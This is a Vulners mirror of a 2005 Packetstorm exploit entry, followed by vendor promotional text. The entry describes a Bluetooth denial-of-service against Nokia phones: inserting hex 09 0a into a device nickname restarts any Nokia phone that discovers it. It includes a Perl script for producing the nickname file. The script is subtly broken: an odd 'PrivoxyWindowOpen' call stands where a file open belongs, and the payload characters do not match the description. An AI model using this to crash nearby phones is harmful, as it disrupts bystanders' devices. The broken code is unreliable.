Lucene search
K

nokia-bt-cx.pl.txt

🗓️ 29 Jun 2005 00:00:00Reported by QnixType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Insert "09 0a" in nickname to restart Nokia phones when discovered via Bluetooth.

Code
`When i was playing with my bluetooth device,  
i found that if you add in your nickname " 09 0a " in hex, it will cause that every one who search for available bluetooth devices and find your nickname his nokia phone will restart.  
you should add a nicname like that,  
  
[something][09 0a in hex][just add anything here]  
  
you should add anything before 09 0a because the nokia phones think that its a space at the end, and it will auto deleted so you should add any thing before 090a .  
  
nokia-bt-cx.pl  
-------------start---------------  
#!/usr/bin/perl -w  
  
my $btnick;  
my $bth;  
my $bts;  
my $file;  
$bth = " .";  
print "\n*******************************************************\n";  
print "** NOKIA REMOTE RESTART IN BLUETOOTH NICKNAME **\n";  
print "** BY QNIX | Q-nix[@]bsdmail[dot]org **\n";  
print "*******************************************************\n";  
print " \n write your nickname : ";  
$btnick = <STDIN>;  
chomp($btnick);  
print " \n OUTPUT : ";  
$file = <STDIN>;  
chomp($file);  
PrivoxyWindowOpen(BLUEN, ">>$file") || die "Could not create file $!\n";  
$bts = "$btnick$bth";  
print BLUEN ("$bts");  
close(BLUEN);  
  
print "\n Done !! , send the output to your nokia and copy the file to the bluetooth nickname space . \n\n";  
-------------end-----------------  
  
  
  
may be someone got more information about that bug or any thing else.  
and maybe someone can develop that problem.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation